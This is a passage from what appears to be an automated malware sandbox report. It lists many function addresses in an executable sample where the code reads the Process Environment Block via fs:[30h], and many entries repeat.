          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166002D mov eax, dword ptr fs:[00000030h]6_2_0166002D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166002D mov eax, dword ptr fs:[00000030h]6_2_0166002D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166002D mov eax, dword ptr fs:[00000030h]6_2_0166002D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164B02A mov eax, dword ptr fs:[00000030h]6_2_0164B02A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164B02A mov eax, dword ptr fs:[00000030h]6_2_0164B02A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164B02A mov eax, dword ptr fs:[00000030h]6_2_0164B02A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164B02A mov eax, dword ptr fs:[00000030h]6_2_0164B02A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01704015 mov eax, dword ptr fs:[00000030h]6_2_01704015
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01704015 mov eax, dword ptr fs:[00000030h]6_2_01704015
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7016 mov eax, dword ptr fs:[00000030h]6_2_016B7016
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7016 mov eax, dword ptr fs:[00000030h]6_2_016B7016
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7016 mov eax, dword ptr fs:[00000030h]6_2_016B7016
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016358EC mov eax, dword ptr fs:[00000030h]6_2_016358EC
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CB8D0 mov eax, dword ptr fs:[00000030h]6_2_016CB8D0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CB8D0 mov ecx, dword ptr fs:[00000030h]6_2_016CB8D0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CB8D0 mov eax, dword ptr fs:[00000030h]6_2_016CB8D0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CB8D0 mov eax, dword ptr fs:[00000030h]6_2_016CB8D0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CB8D0 mov eax, dword ptr fs:[00000030h]6_2_016CB8D0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CB8D0 mov eax, dword ptr fs:[00000030h]6_2_016CB8D0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016620A0 mov eax, dword ptr fs:[00000030h]6_2_016620A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016620A0 mov eax, dword ptr fs:[00000030h]6_2_016620A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016620A0 mov eax, dword ptr fs:[00000030h]6_2_016620A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016620A0 mov eax, dword ptr fs:[00000030h]6_2_016620A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016620A0 mov eax, dword ptr fs:[00000030h]6_2_016620A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016620A0 mov eax, dword ptr fs:[00000030h]6_2_016620A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016790AF mov eax, dword ptr fs:[00000030h]6_2_016790AF
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166F0BF mov ecx, dword ptr fs:[00000030h]6_2_0166F0BF
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166F0BF mov eax, dword ptr fs:[00000030h]6_2_0166F0BF
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166F0BF mov eax, dword ptr fs:[00000030h]6_2_0166F0BF
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639080 mov eax, dword ptr fs:[00000030h]6_2_01639080
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B3884 mov eax, dword ptr fs:[00000030h]6_2_016B3884
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B3884 mov eax, dword ptr fs:[00000030h]6_2_016B3884
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163DB60 mov ecx, dword ptr fs:[00000030h]6_2_0163DB60
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01663B7A mov eax, dword ptr fs:[00000030h]6_2_01663B7A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01663B7A mov eax, dword ptr fs:[00000030h]6_2_01663B7A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163DB40 mov eax, dword ptr fs:[00000030h]6_2_0163DB40
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708B58 mov eax, dword ptr fs:[00000030h]6_2_01708B58
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163F358 mov eax, dword ptr fs:[00000030h]6_2_0163F358
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F131B mov eax, dword ptr fs:[00000030h]6_2_016F131B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016603E2 mov eax, dword ptr fs:[00000030h]6_2_016603E2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016603E2 mov eax, dword ptr fs:[00000030h]6_2_016603E2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016603E2 mov eax, dword ptr fs:[00000030h]6_2_016603E2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016603E2 mov eax, dword ptr fs:[00000030h]6_2_016603E2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016603E2 mov eax, dword ptr fs:[00000030h]6_2_016603E2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016603E2 mov eax, dword ptr fs:[00000030h]6_2_016603E2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165DBE9 mov eax, dword ptr fs:[00000030h]6_2_0165DBE9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B53CA mov eax, dword ptr fs:[00000030h]6_2_016B53CA
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B53CA mov eax, dword ptr fs:[00000030h]6_2_016B53CA
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664BAD mov eax, dword ptr fs:[00000030h]6_2_01664BAD
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664BAD mov eax, dword ptr fs:[00000030h]6_2_01664BAD
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664BAD mov eax, dword ptr fs:[00000030h]6_2_01664BAD
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01705BA5 mov eax, dword ptr fs:[00000030h]6_2_01705BA5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F138A mov eax, dword ptr fs:[00000030h]6_2_016F138A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01641B8F mov eax, dword ptr fs:[00000030h]6_2_01641B8F
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01641B8F mov eax, dword ptr fs:[00000030h]6_2_01641B8F
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016ED380 mov ecx, dword ptr fs:[00000030h]6_2_016ED380
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662397 mov eax, dword ptr fs:[00000030h]6_2_01662397
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166B390 mov eax, dword ptr fs:[00000030h]6_2_0166B390
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016EB260 mov eax, dword ptr fs:[00000030h]6_2_016EB260
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016EB260 mov eax, dword ptr fs:[00000030h]6_2_016EB260
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708A62 mov eax, dword ptr fs:[00000030h]6_2_01708A62
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167927A mov eax, dword ptr fs:[00000030h]6_2_0167927A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639240 mov eax, dword ptr fs:[00000030h]6_2_01639240
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639240 mov eax, dword ptr fs:[00000030h]6_2_01639240
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639240 mov eax, dword ptr fs:[00000030h]6_2_01639240
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639240 mov eax, dword ptr fs:[00000030h]6_2_01639240
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FEA55 mov eax, dword ptr fs:[00000030h]6_2_016FEA55
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016C4257 mov eax, dword ptr fs:[00000030h]6_2_016C4257
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01674A2C mov eax, dword ptr fs:[00000030h]6_2_01674A2C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01674A2C mov eax, dword ptr fs:[00000030h]6_2_01674A2C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01648A0A mov eax, dword ptr fs:[00000030h]6_2_01648A0A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01635210 mov eax, dword ptr fs:[00000030h]6_2_01635210
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01635210 mov ecx, dword ptr fs:[00000030h]6_2_01635210
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01635210 mov eax, dword ptr fs:[00000030h]6_2_01635210
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01635210 mov eax, dword ptr fs:[00000030h]6_2_01635210
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163AA16 mov eax, dword ptr fs:[00000030h]6_2_0163AA16
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163AA16 mov eax, dword ptr fs:[00000030h]6_2_0163AA16
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01653A1C mov eax, dword ptr fs:[00000030h]6_2_01653A1C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FAA16 mov eax, dword ptr fs:[00000030h]6_2_016FAA16
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FAA16 mov eax, dword ptr fs:[00000030h]6_2_016FAA16
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662AE4 mov eax, dword ptr fs:[00000030h]6_2_01662AE4
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662ACB mov eax, dword ptr fs:[00000030h]6_2_01662ACB
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016352A5 mov eax, dword ptr fs:[00000030h]6_2_016352A5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016352A5 mov eax, dword ptr fs:[00000030h]6_2_016352A5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016352A5 mov eax, dword ptr fs:[00000030h]6_2_016352A5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016352A5 mov eax, dword ptr fs:[00000030h]6_2_016352A5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016352A5 mov eax, dword ptr fs:[00000030h]6_2_016352A5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164AAB0 mov eax, dword ptr fs:[00000030h]6_2_0164AAB0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164AAB0 mov eax, dword ptr fs:[00000030h]6_2_0164AAB0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166FAB0 mov eax, dword ptr fs:[00000030h]6_2_0166FAB0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166D294 mov eax, dword ptr fs:[00000030h]6_2_0166D294
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166D294 mov eax, dword ptr fs:[00000030h]6_2_0166D294
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165C577 mov eax, dword ptr fs:[00000030h]6_2_0165C577
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165C577 mov eax, dword ptr fs:[00000030h]6_2_0165C577
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01673D43 mov eax, dword ptr fs:[00000030h]6_2_01673D43
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B3540 mov eax, dword ptr fs:[00000030h]6_2_016B3540
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01657D50 mov eax, dword ptr fs:[00000030h]6_2_01657D50
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708D34 mov eax, dword ptr fs:[00000030h]6_2_01708D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163AD30 mov eax, dword ptr fs:[00000030h]6_2_0163AD30
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FE539 mov eax, dword ptr fs:[00000030h]6_2_016FE539
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016BA537 mov eax, dword ptr fs:[00000030h]6_2_016BA537
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664D3B mov eax, dword ptr fs:[00000030h]6_2_01664D3B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664D3B mov eax, dword ptr fs:[00000030h]6_2_01664D3B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664D3B mov eax, dword ptr fs:[00000030h]6_2_01664D3B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164D5E0 mov eax, dword ptr fs:[00000030h]6_2_0164D5E0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164D5E0 mov eax, dword ptr fs:[00000030h]6_2_0164D5E0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FFDE2 mov eax, dword ptr fs:[00000030h]6_2_016FFDE2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FFDE2 mov eax, dword ptr fs:[00000030h]6_2_016FFDE2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FFDE2 mov eax, dword ptr fs:[00000030h]6_2_016FFDE2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FFDE2 mov eax, dword ptr fs:[00000030h]6_2_016FFDE2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016E8DF1 mov eax, dword ptr fs:[00000030h]6_2_016E8DF1
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]6_2_016B6DC9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]6_2_016B6DC9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]6_2_016B6DC9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov ecx, dword ptr fs:[00000030h]6_2_016B6DC9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]6_2_016B6DC9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]6_2_016B6DC9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016635A1 mov eax, dword ptr fs:[00000030h]6_2_016635A1
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01661DB5 mov eax, dword ptr fs:[00000030h]6_2_01661DB5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01661DB5 mov eax, dword ptr fs:[00000030h]6_2_01661DB5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01661DB5 mov eax, dword ptr fs:[00000030h]6_2_01661DB5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_017005AC mov eax, dword ptr fs:[00000030h]6_2_017005AC
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_017005AC mov eax, dword ptr fs:[00000030h]6_2_017005AC
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662581 mov eax, dword ptr fs:[00000030h]6_2_01662581
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662581 mov eax, dword ptr fs:[00000030h]6_2_01662581
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662581 mov eax, dword ptr fs:[00000030h]6_2_01662581
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662581 mov eax, dword ptr fs:[00000030h]6_2_01662581
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]6_2_01632D8A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]6_2_01632D8A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]6_2_01632D8A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]6_2_01632D8A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]6_2_01632D8A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166FD9B mov eax, dword ptr fs:[00000030h]6_2_0166FD9B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166FD9B mov eax, dword ptr fs:[00000030h]6_2_0166FD9B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165746D mov eax, dword ptr fs:[00000030h]6_2_0165746D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A44B mov eax, dword ptr fs:[00000030h]6_2_0166A44B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CC450 mov eax, dword ptr fs:[00000030h]6_2_016CC450
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CC450 mov eax, dword ptr fs:[00000030h]6_2_016CC450
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166BC2C mov eax, dword ptr fs:[00000030h]6_2_0166BC2C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6C0A mov eax, dword ptr fs:[00000030h]6_2_016B6C0A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6C0A mov eax, dword ptr fs:[00000030h]6_2_016B6C0A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6C0A mov eax, dword ptr fs:[00000030h]6_2_016B6C0A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6C0A mov eax, dword ptr fs:[00000030h]6_2_016B6C0A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170740D mov eax, dword ptr fs:[00000030h]6_2_0170740D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170740D mov eax, dword ptr fs:[00000030h]6_2_0170740D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170740D mov eax, dword ptr fs:[00000030h]6_2_0170740D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F14FB mov eax, dword ptr fs:[00000030h]6_2_016F14FB
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6CF0 mov eax, dword ptr fs:[00000030h]6_2_016B6CF0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6CF0 mov eax, dword ptr fs:[00000030h]6_2_016B6CF0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6CF0 mov eax, dword ptr fs:[00000030h]6_2_016B6CF0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708CD6 mov eax, dword ptr fs:[00000030h]6_2_01708CD6
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164849B mov eax, dword ptr fs:[00000030h]6_2_0164849B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164FF60 mov eax, dword ptr fs:[00000030h]6_2_0164FF60
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708F6A mov eax, dword ptr fs:[00000030h]6_2_01708F6A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164EF40 mov eax, dword ptr fs:[00000030h]6_2_0164EF40
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01634F2E mov eax, dword ptr fs:[00000030h]6_2_01634F2E
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01634F2E mov eax, dword ptr fs:[00000030h]6_2_01634F2E
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166E730 mov eax, dword ptr fs:[00000030h]6_2_0166E730
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A70E mov eax, dword ptr fs:[00000030h]6_2_0166A70E
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A70E mov eax, dword ptr fs:[00000030h]6_2_0166A70E
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165F716 mov eax, dword ptr fs:[00000030h]6_2_0165F716
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CFF10 mov eax, dword ptr fs:[00000030h]6_2_016CFF10
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CFF10 mov eax, dword ptr fs:[00000030h]6_2_016CFF10
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170070D mov eax, dword ptr fs:[00000030h]6_2_0170070D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170070D mov eax, dword ptr fs:[00000030h]6_2_0170070D
